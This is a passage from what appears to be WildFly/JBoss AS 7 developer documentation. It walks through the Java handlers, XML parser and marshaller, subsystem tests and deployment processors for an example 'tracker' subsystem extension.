\nFinally we have some methods to add and remove deployments, and to set\nand read the `tick`. The 'cool' deployments will be explained later.\n\n[source,java,options=\"nowrap\"]\n----\npublic void addDeployment(String name) {\n        deployments.add(name);\n    }\n\n    public void addCoolDeployment(String name) {\n        coolDeployments.add(name);\n    }\n\n    public void removeDeployment(String name) {\n        deployments.remove(name);\n        coolDeployments.remove(name);\n    }\n\n    void setTick(long tick) {\n        this.tick.set(tick);\n    }\n\n    public long getTick() {\n        return this.tick.get();\n    }\n}\/\/TrackerService - end\n----\n\nSince we are able to add `type` children, we need a way to be able to\nremove them, so we create a\n`com.acme.corp.tracker.extension.TypeRemoveHandler`. In this case we\nextend `AbstractRemoveStepHandler`, which takes care of removing the\nresource from the model, so we don't need to override its\n`performRemove()` operation. But we need to implement the\n`DescriptionProvider` method to provide the model description, and since\nthe add handler installs the TrackerService, we need to remove that in\nthe `performRuntime()` method.\n\n[source,java,options=\"nowrap\"]\n----\npublic class TypeRemoveHandler extends AbstractRemoveStepHandler {\n\n    public static final TypeRemoveHandler INSTANCE = new TypeRemoveHandler();\n\n    private TypeRemoveHandler() {\n    }\n\n    @Override\n    protected void performRuntime(OperationContext context, ModelNode operation, ModelNode model) throws OperationFailedException {\n        String suffix = PathAddress.pathAddress(operation.get(ModelDescriptionConstants.ADDRESS)).getLastElement().getValue();\n        ServiceName name = TrackerService.createServiceName(suffix);\n        context.removeService(name);\n    }\n\n}\n----\n\nWe then need a description provider for the `type` part of the model\nitself, so we modify `TypeDefinition` to register the `tick` attribute:\n\n[source,java,options=\"nowrap\"]\n----\nclass TypeDefinition{\n...\n@Override\npublic void registerAttributes(ManagementResourceRegistration resourceRegistration){\n    resourceRegistration.registerReadWriteAttribute(TICK, null, TrackerTickHandler.INSTANCE);\n}\n\n}\n----\n\nThen finally we need to specify that our new `type` child and associated\nhandlers go under `\/subsystem=tracker\/type=*` in the model by\nregistering it with the model in `SubsystemExtension.initialize()`. So\nwe add the following just before the end of the method.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\npublic void initialize(ExtensionContext context)\n{\n    final SubsystemRegistration subsystem = context.registerSubsystem(SUBSYSTEM_NAME, 1, 0);\n    final ManagementResourceRegistration registration = subsystem.registerSubsystemModel(TrackerSubsystemDefinition.INSTANCE);\n    \/\/Add the type child\n    ManagementResourceRegistration typeChild = registration.registerSubModel(TypeDefinition.INSTANCE);\n    subsystem.registerXMLElementWriter(parser);\n}\n----\n\nThe above first creates a child of our main subsystem registration for\nthe relative address `type=*`, and gets the `typeChild` registration.\nTo this we add the `TypeAddHandler` and `TypeRemoveHandler`.
\nThe add variety is added under the name `add` and the remove handler\nunder the name `remove`, and for each registered operation handler we\nuse the handler singleton instance as both the handler parameter and as\nthe `DescriptionProvider`.\n\nFinally, we register `tick` as a read\/write attribute. The null\nparameter means we don't do anything special with regards to reading it;\nfor the write handler we supply an operation handler called\n`TrackerTickHandler`. Registering it as a read\/write attribute means we\ncan use the `:write-attribute` operation to modify the value of the\nparameter, and it will be handled by `TrackerTickHandler`.\n\nNot registering a write attribute handler makes the attribute read only.\n\n`TrackerTickHandler` extends `AbstractWriteAttributeHandler` directly,\nand so must implement its `applyUpdateToRuntime` and\n`revertUpdateToRuntime` methods. The superclass takes care of the model\nmanipulation (validation, setting), leaving us to deal with just what we\nneed to do.\n\n[source,java,options=\"nowrap\"]\n----\nclass TrackerTickHandler extends AbstractWriteAttributeHandler<Void> {\n\n    public static final TrackerTickHandler INSTANCE = new TrackerTickHandler();\n\n    private TrackerTickHandler() {\n        super(TypeDefinition.TICK);\n    }\n\n    protected boolean applyUpdateToRuntime(OperationContext context, ModelNode operation, String attributeName,\n            ModelNode resolvedValue, ModelNode currentValue, HandbackHolder<Void> handbackHolder) throws OperationFailedException {\n\n        modifyTick(context, operation, resolvedValue.asLong());\n\n        return false;\n    }\n\n    protected void revertUpdateToRuntime(OperationContext context, ModelNode operation, String attributeName, ModelNode valueToRestore, ModelNode valueToRevert, Void handback){\n        modifyTick(context, operation, valueToRestore.asLong());\n    }\n\n    private void modifyTick(OperationContext context, ModelNode operation, long value) throws OperationFailedException {\n\n        final String suffix = PathAddress.pathAddress(operation.get(ModelDescriptionConstants.ADDRESS)).getLastElement().getValue();\n        TrackerService service = (TrackerService) context.getServiceRegistry(true).getRequiredService(TrackerService.createServiceName(suffix)).getValue();\n        service.setTick(value);\n    }\n\n}\n----\n\nThe operation used to execute this will be of the form\n`\/subsystem=tracker\/type=war:write-attribute(name=tick,value=12345)`, so\nwe first get the `suffix` from the operation address, and the `tick`\nvalue from the handler's `resolvedValue` parameter, and use\nthat to update the model.\n\nWe then add a new step associated with the `RUNTIME` stage to update the\ntick of the TrackerService for our suffix. This is essential since the\ncall to `context.getServiceRegistry()` will fail unless the step\naccessing it belongs to the `RUNTIME` stage.\n\n[NOTE]\nWhen implementing `execute()`, you *must* call `context.completeStep()`\nwhen you are done.\n\n[[parsing-and-marshalling-of-the-subsystem-xml]]\n== Parsing and marshalling of the subsystem xml\n\nWildFly uses the Stax API to parse the xml files.\n
This is initialized in\n`SubsystemExtension` by mapping our parser onto our namespace:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n\n \/** The name space used for the {@code subsystem} element *\/\n public static final String NAMESPACE = \"urn:com.acme.corp.tracker:1.0\";\n ...\n protected static final PathElement SUBSYSTEM_PATH = PathElement.pathElement(SUBSYSTEM, SUBSYSTEM_NAME);\n protected static final PathElement TYPE_PATH = PathElement.pathElement(TYPE);\n\n \/** The parser used for parsing our subsystem *\/\n private final SubsystemParser parser = new SubsystemParser();\n\n @Override\n public void initializeParsers(ExtensionParsingContext context) {\n context.setSubsystemXmlMapping(NAMESPACE, parser);\n }\n ...\n----\n\nWe then need to write the parser. The contract is that we read our\nsubsystem's xml and create the operations that will populate the model\nwith the state contained in the xml. These operations will then be\nexecuted on our behalf as part of the parsing process. The entry point\nis the `readElement()` method.\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n\n \/**\n * The subsystem parser, which uses stax to read and write to and from xml\n *\/\n private static class SubsystemParser implements XMLStreamConstants, XMLElementReader<List<ModelNode>>, XMLElementWriter<SubsystemMarshallingContext> {\n\n \/** {@inheritDoc} *\/\n @Override\n public void readElement(XMLExtendedStreamReader reader, List<ModelNode> list) throws XMLStreamException {\n \/\/ Require no attributes\n ParseUtils.requireNoAttributes(reader);\n\n \/\/Add the main subsystem 'add' operation\n final ModelNode subsystem = new ModelNode();\n subsystem.get(OP).set(ADD);\n subsystem.get(OP_ADDR).set(PathAddress.pathAddress(SUBSYSTEM_PATH).toModelNode());\n list.add(subsystem);\n\n \/\/Read the children\n while (reader.hasNext() && reader.nextTag() != END_ELEMENT) {\n if (!reader.getLocalName().equals(\"deployment-types\")) {\n throw ParseUtils.unexpectedElement(reader);\n }\n while (reader.hasNext() && reader.nextTag() != END_ELEMENT) {\n if (reader.isStartElement()) {\n readDeploymentType(reader, list);\n }\n }\n }\n }\n\n private void readDeploymentType(XMLExtendedStreamReader reader, List<ModelNode> list) throws XMLStreamException {\n if (!reader.getLocalName().equals(\"deployment-type\")) {\n throw ParseUtils.unexpectedElement(reader);\n }\n ModelNode addTypeOperation = new ModelNode();\n addTypeOperation.get(OP).set(ModelDescriptionConstants.ADD);\n\n String suffix = null;\n for (int i = 0; i < reader.getAttributeCount(); i++) {\n String attr = reader.getAttributeLocalName(i);
 String value = reader.getAttributeValue(i);\n if (attr.equals(\"tick\")) {\n TypeDefinition.TICK.parseAndSetParameter(value, addTypeOperation, reader);\n } else if (attr.equals(\"suffix\")) {\n suffix = value;\n } else {\n throw ParseUtils.unexpectedAttribute(reader, i);\n }\n }\n ParseUtils.requireNoContent(reader);\n if (suffix == null) {\n throw ParseUtils.missingRequiredElement(reader, Collections.singleton(\"suffix\"));\n }\n\n \/\/Add the 'add' operation for each 'type' child\n PathAddress addr = PathAddress.pathAddress(SUBSYSTEM_PATH, PathElement.pathElement(TYPE, suffix));\n addTypeOperation.get(OP_ADDR).set(addr.toModelNode());\n list.add(addTypeOperation);\n }\n ...\n----\n\nSo in the above we always create the add operation for our subsystem.\nDue to its address `\/subsystem=tracker`, defined by `SUBSYSTEM_PATH`, this\nwill trigger the `SubsystemAddHandler` we created earlier when we invoke\n`\/subsystem=tracker:add`. We then parse the child elements and create an\nadd operation for the child address for each `type` child.
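\nFor reference, the xml consumed by `readElement()` has the same shape as the\nsubsystem configuration shown later in this tutorial:\n\n[source,xml,options=\"nowrap\"]\n----\n<subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n <deployment-types>\n <deployment-type suffix=\"sar\" tick=\"10000\"\/>\n <deployment-type suffix=\"war\" tick=\"10000\"\/>\n <\/deployment-types>\n<\/subsystem>\n----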
\nSince the\naddress will, for example, be `\/subsystem=tracker\/type=sar` (defined by\n`TYPE_PATH`) and `TypeAddHandler` is registered for all `type`\nsubaddresses, the `TypeAddHandler` will get invoked for those operations.\nNote that when we parse the `tick` attribute we use the attribute\ndefinition we created in `TypeDefinition` to parse the attribute value\nand apply all the rules that we specified for this attribute; this also\nenables us to properly support expressions on attributes.\n\nThe parser is also used to marshal the model to xml whenever something\nmodifies the model, for which the entry point is the `writeContent()`\nmethod:\n\n[source,java,options=\"nowrap\"]\n----\nprivate static class SubsystemParser implements XMLStreamConstants, XMLElementReader<List<ModelNode>>, XMLElementWriter<SubsystemMarshallingContext> {\n ...\n \/** {@inheritDoc} *\/\n @Override\n public void writeContent(final XMLExtendedStreamWriter writer, final SubsystemMarshallingContext context) throws XMLStreamException {\n \/\/Write out the main subsystem element\n context.startSubsystemElement(TrackerExtension.NAMESPACE, false);\n writer.writeStartElement(\"deployment-types\");\n ModelNode node = context.getModelNode();\n ModelNode type = node.get(TYPE);\n for (Property property : type.asPropertyList()) {\n\n \/\/write each child element to xml\n writer.writeStartElement(\"deployment-type\");\n writer.writeAttribute(\"suffix\", property.getName());\n ModelNode entry = property.getValue();\n TypeDefinition.TICK.marshallAsAttribute(entry, true, writer);\n writer.writeEndElement();\n }\n \/\/End deployment-types\n writer.writeEndElement();\n \/\/End subsystem\n writer.writeEndElement();\n }\n }\n----\n\nThen we have to implement the `SubsystemDescribeHandler` which\ntranslates the current state of the model into operations similar to the\nones created by the parser. The `SubsystemDescribeHandler` is only used\nwhen running in a managed domain, and is used when the host controller\nqueries the domain controller for the configuration of the profile used\nto start up each server. In our case the `SubsystemDescribeHandler` adds\nthe operation to add the subsystem and then adds the operation to add\neach `type` child.
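\nFor illustration, this is the kind of result the `describe` operation\nproduces from the CLI (abridged and purely illustrative output, not a\ncaptured session):\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker:describe\n{\n \"outcome\" => \"success\",\n \"result\" => [\n {\"operation\" => \"add\", \"address\" => [(\"subsystem\" => \"tracker\")]},\n {\"operation\" => \"add\", \"address\" => [(\"subsystem\" => \"tracker\"),(\"type\" => \"war\")], \"tick\" => 10000L}\n ]\n}\n----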
\nSince we are using a `ResourceDefinition` for defining the subsystem,\nall of that is generated for us, but if you want to customize it you can\ndo so by implementing it like this.\n\n[source,java,options=\"nowrap\"]\n----\nprivate static class SubsystemDescribeHandler implements OperationStepHandler, DescriptionProvider {\n static final SubsystemDescribeHandler INSTANCE = new SubsystemDescribeHandler();\n\n public void execute(OperationContext context, ModelNode operation) throws OperationFailedException {\n \/\/Add the main operation\n context.getResult().add(createAddSubsystemOperation());\n\n \/\/Add the operations to create each child\n\n ModelNode node = context.readModel(PathAddress.EMPTY_ADDRESS);\n for (Property property : node.get(\"type\").asPropertyList()) {\n\n ModelNode addType = new ModelNode();\n addType.get(OP).set(ModelDescriptionConstants.ADD);\n PathAddress addr = PathAddress.pathAddress(SUBSYSTEM_PATH, PathElement.pathElement(\"type\", property.getName()));\n addType.get(OP_ADDR).set(addr.toModelNode());\n if (property.getValue().hasDefined(\"tick\")) {\n TypeDefinition.TICK.validateAndSet(property,addType);\n }\n context.getResult().add(addType);\n }\n context.completeStep();\n }\n\n}\n----\n\n[[testing-the-parsers]]\n=== Testing the parsers\n\n.Changes to tests between 7.0.0 and 7.0.1\n[NOTE]\n====\nThe testing framework was moved from the archetype into the core JBoss\nAS 7 sources between JBoss AS 7.0.0 and JBoss AS 7.0.1, and has been\nimproved upon and is used internally for testing JBoss AS 7's\nsubsystems. The difference between the two versions is that in\n7.0.0.Final the testing framework is bundled with the code generated by\nthe archetype (in a sub-package of the package specified for your\nsubsystem, e.g. `com.acme.corp.tracker.support`), and the test extends\nthe `AbstractParsingTest` class.\n\nFrom 7.0.1 the testing framework is brought in via the\n`org.jboss.as:jboss-as-subsystem-test` maven artifact, and the test's\nsuperclass is `org.jboss.as.subsystem.test.AbstractSubsystemTest`. The\nconcepts are the same, but more functionality will become available\nas JBoss AS 7 is developed.\n====\n\nNow that we have modified our parsers we need to update our tests to\nreflect the new model. There are currently three tests testing the basic\nfunctionality, something which is a lot easier to debug from your IDE\nbefore you plug it into the application server. We will talk about these\ntests in turn; they all live in\n`com.acme.corp.tracker.extension.SubsystemParsingTestCase`.\n`SubsystemParsingTestCase` extends `AbstractSubsystemTest`, which does a\nlot of the setup for you and contains utility methods for verifying\nthings from your test. See the javadoc of that class for more\ninformation about the functionality available to you. And by all means\nfeel free to add more tests for your subsystem; here we are only testing\nthe best case scenario, while you will probably want to throw in a\nfew tests for edge cases.\n\nThe first test we need to modify is `testParseSubsystem()`. It tests\nthat the parsed xml becomes the expected operations that will be passed\ninto the server, so let us tweak this test to match our subsystem.
First\nwe tell the test to parse the xml into operations:\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testParseSubsystem() throws Exception {\n \/\/Parse the subsystem xml into operations\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n List<ModelNode> operations = super.parse(subsystemXml);\n----\n\nThere should be one operation for adding the subsystem itself and one\noperation for adding the `deployment-type`, so check that we got two\noperations:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that we have the expected number of operations\n Assert.assertEquals(2, operations.size());\n----\n\nNow check that the first operation is `add` for the address\n`\/subsystem=tracker`:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that each operation has the correct content\n \/\/The add subsystem operation will happen first\n ModelNode addSubsystem = operations.get(0);\n Assert.assertEquals(ADD, addSubsystem.get(OP).asString());\n PathAddress addr = PathAddress.pathAddress(addSubsystem.get(OP_ADDR));\n Assert.assertEquals(1, addr.size());\n PathElement element = addr.getElement(0);\n Assert.assertEquals(SUBSYSTEM, element.getKey());\n Assert.assertEquals(SubsystemExtension.SUBSYSTEM_NAME, element.getValue());\n----\n\nThen check that the second operation is `add` for the address\n`\/subsystem=tracker\/type=tst`, and that `12345` was picked up for the value of\nthe `tick` parameter:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Then we will get the add type operation\n ModelNode addType = operations.get(1);\n Assert.assertEquals(ADD, addType.get(OP).asString());\n Assert.assertEquals(12345, addType.get(\"tick\").asLong());\n addr = PathAddress.pathAddress(addType.get(OP_ADDR));\n Assert.assertEquals(2, addr.size());\n element = addr.getElement(0);\n Assert.assertEquals(SUBSYSTEM, element.getKey());\n Assert.assertEquals(SubsystemExtension.SUBSYSTEM_NAME, element.getValue());\n element = addr.getElement(1);\n Assert.assertEquals(\"type\", element.getKey());\n Assert.assertEquals(\"tst\", element.getValue());\n }\n----\n\nThe second test we need to modify is `testInstallIntoController()`, which\ntests that the xml installs properly into the controller. In other words,\nwe are making sure that the `add` operations we created earlier work\nproperly.
First we create the xml and install it into the controller.\nBehind the scenes this will parse the xml into operations as we saw in\nthe last test, but it will also create a new controller and boot that up\nusing the created operations:\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testInstallIntoController() throws Exception {\n \/\/Parse the subsystem xml and install into the controller\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices services = super.installInController(subsystemXml);\n----\n\nThe returned `KernelServices` allow us to execute operations on the\ncontroller, and to read the whole model.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Read the whole model and make sure it looks as expected\n ModelNode model = services.readWholeModel();\n \/\/Useful for debugging :-)\n \/\/System.out.println(model);\n----\n\nNow we make sure that the structure of the model within the controller\nhas the expected format and values:\n\n[source,java,options=\"nowrap\"]\n----\nAssert.assertTrue(model.get(SUBSYSTEM).hasDefined(SubsystemExtension.SUBSYSTEM_NAME));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME).hasDefined(\"type\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\").hasDefined(\"tst\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\").hasDefined(\"tick\"));\n Assert.assertEquals(12345, model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\", \"tick\").asLong());\n }\n----\n\nThe last test provided is called `testParseAndMarshalModel()`. Its main\npurpose is to make sure that our `SubsystemParser.writeContent()` works\nas expected. This is achieved by starting a controller in the same way\nas before:\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testParseAndMarshalModel() throws Exception {\n \/\/Parse the subsystem xml and install into the first controller\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices servicesA = super.installInController(subsystemXml);\n----\n\nNow we read the model and the xml that was persisted from the first\ncontroller, and use that xml to start a second controller:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Get the model and the persisted xml from the first controller\n ModelNode modelA = servicesA.readWholeModel();\n String marshalled = servicesA.getPersistedSubsystemXml();\n\n \/\/Install the persisted xml from the first controller into a second controller\n KernelServices servicesB = super.installInController(marshalled);\n----\n\nFinally we read the model from the second controller, and make sure that\nthe models are identical by calling `compare()` on the test superclass.\n\n[source,java,options=\"nowrap\"]\n----\nModelNode modelB = servicesB.readWholeModel();\n\n \/\/Make sure the models from the two controllers are identical\n super.compare(modelA, modelB);\n }\n----\n\nWe then have a test that needs no changing from what the archetype\nprovides us with.
As we have seen before, we start a controller:\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testDescribeHandler() throws Exception {\n \/\/Parse the subsystem xml and install into the first controller\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \"<\/subsystem>\";\n KernelServices servicesA = super.installInController(subsystemXml);\n----\n\nWe then call `\/subsystem=tracker:describe`, which outputs the subsystem\nas the operations needed to reach the current state (done by our\n`SubsystemDescribeHandler`):\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Get the model and the describe operations from the first controller\n ModelNode modelA = servicesA.readWholeModel();\n ModelNode describeOp = new ModelNode();\n describeOp.get(OP).set(DESCRIBE);\n describeOp.get(OP_ADDR).set(\n PathAddress.pathAddress(\n PathElement.pathElement(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME)).toModelNode());\n List<ModelNode> operations = super.checkResultAndGetContents(servicesA.executeOperation(describeOp)).asList();\n----\n\nThen we create a new controller using those operations:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Install the describe options from the first controller into a second controller\n KernelServices servicesB = super.installInController(operations);\n----\n\nAnd then we read the model from the second controller and make sure that\nthe two subsystems are identical:\n\n[source,java,options=\"nowrap\"]\n----\nModelNode modelB = servicesB.readWholeModel();\n\n \/\/Make sure the models from the two controllers are identical\n super.compare(modelA, modelB);\n\n }\n----\n\nTo test the removal of the subsystem and child resources we modify\nthe `testSubsystemRemoval()` test provided by the archetype:\n\n[source,java,options=\"nowrap\"]\n----\n\/**\n * Tests that the subsystem can be removed\n *\/\n @Test\n public void testSubsystemRemoval() throws Exception {\n \/\/Parse the subsystem xml and install into the first controller\n----\n\nWe provide xml for the subsystem installing a child, which in turn\ninstalls a TrackerService:\n\n[source,java,options=\"nowrap\"]\n----\nString subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices services = super.installInController(subsystemXml);\n----\n\nHaving installed the xml into the controller we make sure the\nTrackerService is there:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Sanity check to test the service for 'tst' was there\n services.getContainer().getRequiredService(TrackerService.createServiceName(\"tst\"));\n----\n\nThis call from the subsystem test harness will call remove for each\nlevel in our subsystem, children first, and validate\nthat the subsystem model is empty at the end.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Checks that the subsystem was removed from the model\n super.assertRemoveSubsystemResources(services);\n----\n\nFinally we check that all the services were removed by the remove\nhandlers:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that any services that were installed were removed here\n try {\n services.getContainer().getRequiredService(TrackerService.createServiceName(\"tst\"));\n Assert.fail(\"Should have removed services\");\n } catch (Exception expected) {\n }\n }\n----\n\nFor good measure let us throw in another test which adds
a\n`deployment-type` and also changes its attribute at runtime. So first of\nall boot up the controller with the same xml we have been using so far:\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testExecuteOperations() throws Exception {\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices services = super.installInController(subsystemXml);\n----\n\nNow create an operation which does the same as the following CLI command\n`\/subsystem=tracker\/type=foo:add(tick=1000)`:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Add another type\n PathAddress fooTypeAddr = PathAddress.pathAddress(\n PathElement.pathElement(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME),\n PathElement.pathElement(\"type\", \"foo\"));\n ModelNode addOp = new ModelNode();\n addOp.get(OP).set(ADD);\n addOp.get(OP_ADDR).set(fooTypeAddr.toModelNode());\n addOp.get(\"tick\").set(1000);\n----\n\nExecute the operation and make sure it was successful:\n\n[source,java,options=\"nowrap\"]\n----\nModelNode result = services.executeOperation(addOp);\n Assert.assertEquals(SUCCESS, result.get(OUTCOME).asString());\n----\n\nRead the whole model and make sure that the original data is still there\n(i.e. the same as what was done by `testInstallIntoController()`):\n\n[source,java,options=\"nowrap\"]\n----\nModelNode model = services.readWholeModel();\n Assert.assertTrue(model.get(SUBSYSTEM).hasDefined(SubsystemExtension.SUBSYSTEM_NAME));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME).hasDefined(\"type\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\").hasDefined(\"tst\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\").hasDefined(\"tick\"));\n Assert.assertEquals(12345, model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\", \"tick\").asLong());\n----\n\nThen make sure our new `type` has been added:\n\n[source,java,options=\"nowrap\"]\n----\nAssert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\").hasDefined(\"foo\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"foo\").hasDefined(\"tick\"));\n Assert.assertEquals(1000, model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"foo\", \"tick\").asLong());\n----\n\nThen we call `write-attribute` to change the `tick` value of\n`\/subsystem=tracker\/type=foo`:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Call write-attribute\n ModelNode writeOp = new ModelNode();\n writeOp.get(OP).set(WRITE_ATTRIBUTE_OPERATION);\n writeOp.get(OP_ADDR).set(fooTypeAddr.toModelNode());\n writeOp.get(NAME).set(\"tick\");\n writeOp.get(VALUE).set(3456);\n result = services.executeOperation(writeOp);\n Assert.assertEquals(SUCCESS, result.get(OUTCOME).asString());\n----\n\nTo give you exposure to other ways of doing things, this time, instead of\nreading the whole model to check the attribute, we call `read-attribute`\nand make sure it has the value we set it to.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that write attribute took effect, this time by calling read-attribute instead of reading the whole model\n ModelNode readOp = new ModelNode();\n readOp.get(OP).set(READ_ATTRIBUTE_OPERATION);\n readOp.get(OP_ADDR).set(fooTypeAddr.toModelNode());
 readOp.get(NAME).set(\"tick\");\n result = services.executeOperation(readOp);\n Assert.assertEquals(3456, checkResultAndGetContents(result).asLong());\n----\n\nSince each `type` installs its own copy of `TrackerService`, we get the\n`TrackerService` for `type=foo` from the service container exposed by\nthe kernel services and make sure it has the right value:\n\n[source,java,options=\"nowrap\"]\n----\nTrackerService service = (TrackerService)services.getContainer().getService(TrackerService.createServiceName(\"foo\")).getValue();\n Assert.assertEquals(3456, service.getTick());\n }\n----\n\n[[add-the-deployers]]\n== Add the deployers\n\nWhen discussing `SubsystemAddHandler` we did not mention the work done\nto install the deployers, which is done in the following method:\n\n[source,java,options=\"nowrap\"]\n----\n @Override\n public void performBoottime(OperationContext context, ModelNode operation, ModelNode model,\n ServiceVerificationHandler verificationHandler, List<ServiceController<?>> newControllers)\n throws OperationFailedException {\n\n log.info(\"Populating the model\");\n\n \/\/Add deployment processors here\n \/\/Remove this if you don't need to hook into the deployers, or you can add as many as you like\n \/\/see SubDeploymentProcessor for explanation of the phases\n context.addStep(new AbstractDeploymentChainStep() {\n public void execute(DeploymentProcessorTarget processorTarget) {\n processorTarget.addDeploymentProcessor(SubsystemDeploymentProcessor.PHASE, SubsystemDeploymentProcessor.priority, new SubsystemDeploymentProcessor());\n\n }\n }, OperationContext.Stage.RUNTIME);\n\n }\n----\n\nThis adds an extra step which is responsible for installing deployment\nprocessors. You can add as many as you like, or avoid adding any\naltogether, depending on your needs. Each processor has a `Phase` and a\n`priority`. Phases are sequential, and a deployment passes through each\nphase's deployment processors. The `priority` specifies where within a\nphase the processor appears. See `org.jboss.as.server.deployment.Phase`\nfor more information about phases.\n\nIn our case we are keeping it simple and staying with one deployment\nprocessor, with the phase and priority created for us by the maven\narchetype. The phases will be explained in the next section.
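\nThe `PHASE` and `priority` values referenced above are constants on the\nprocessor class itself. A minimal sketch follows; the exact phase and\npriority shown are illustrative only, so keep whatever the archetype\ngenerated for you:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemDeploymentProcessor implements DeploymentUnitProcessor {\n\n \/\/Illustrative values only; the archetype picks suitable ones\n public static final Phase PHASE = Phase.DEPENDENCIES;\n public static final int priority = 0x4000;\n\n \/\/deploy() and undeploy() are shown below\n}\n----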
\nThe\ndeployment processor is as follows:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemDeploymentProcessor implements DeploymentUnitProcessor {\n ...\n\n @Override\n public void deploy(DeploymentPhaseContext phaseContext) throws DeploymentUnitProcessingException {\n String name = phaseContext.getDeploymentUnit().getName();\n TrackerService service = getTrackerService(phaseContext.getServiceRegistry(), name);\n if (service != null) {\n ResourceRoot root = phaseContext.getDeploymentUnit().getAttachment(Attachments.DEPLOYMENT_ROOT);\n VirtualFile cool = root.getRoot().getChild(\"META-INF\/cool.txt\");\n service.addDeployment(name);\n if (cool.exists()) {\n service.addCoolDeployment(name);\n }\n }\n }\n\n @Override\n public void undeploy(DeploymentUnit context) {\n context.getServiceRegistry();\n String name = context.getName();\n TrackerService service = getTrackerService(context.getServiceRegistry(), name);\n if (service != null) {\n service.removeDeployment(name);\n }\n }\n\n private TrackerService getTrackerService(ServiceRegistry registry, String name) {\n int last = name.lastIndexOf(\".\");\n String suffix = name.substring(last + 1);\n ServiceController<?> container = registry.getService(TrackerService.createServiceName(suffix));\n if (container != null) {\n TrackerService service = (TrackerService)container.getValue();\n return service;\n }\n return null;\n }\n}\n----\n\nThe `deploy()` method is called when a deployment is being deployed. In\nthis case we look for the `TrackerService` instance for the service name\ncreated from the deployment's suffix. If there is one it means that we\nare meant to be tracking deployments with this suffix (i.e.\n`TypeAddHandler` was called for this suffix), and if we find one we add\nthe deployment's name to it. Similarly `undeploy()` is called when a\ndeployment is being undeployed, and if there is a `TrackerService`\ninstance for the deployment's suffix, we remove the deployment's name\nfrom it.\n\n[[deployment-phases-and-attachments]]\n=== Deployment phases and attachments\n\nThe code in the SubsystemDeploymentProcessor uses an _attachment_, which\nis the means of communication between the individual deployment\nprocessors. A deployment processor belonging to a phase may create an\nattachment which is then read further along the chain of deployment unit\nprocessors. In the above example we look for the\n`Attachments.DEPLOYMENT_ROOT` attachment, which is a view of the file\nstructure of the deployment unit put in place before the chain of\ndeployment unit processors is invoked.\n\nAs mentioned above, the deployment unit processors are organized in\nphases, and have a relative order within each phase. A deployment unit\npasses through all the deployment unit processors in that order. A\ndeployment unit processor may choose to take action or not depending on\nwhat attachments are available. Let's take a quick look at what the\ndeployment unit processors do 